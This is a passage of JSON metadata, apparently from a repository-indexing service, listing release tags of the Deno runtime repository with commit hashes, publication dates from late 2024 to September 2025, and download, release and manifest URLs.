0Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/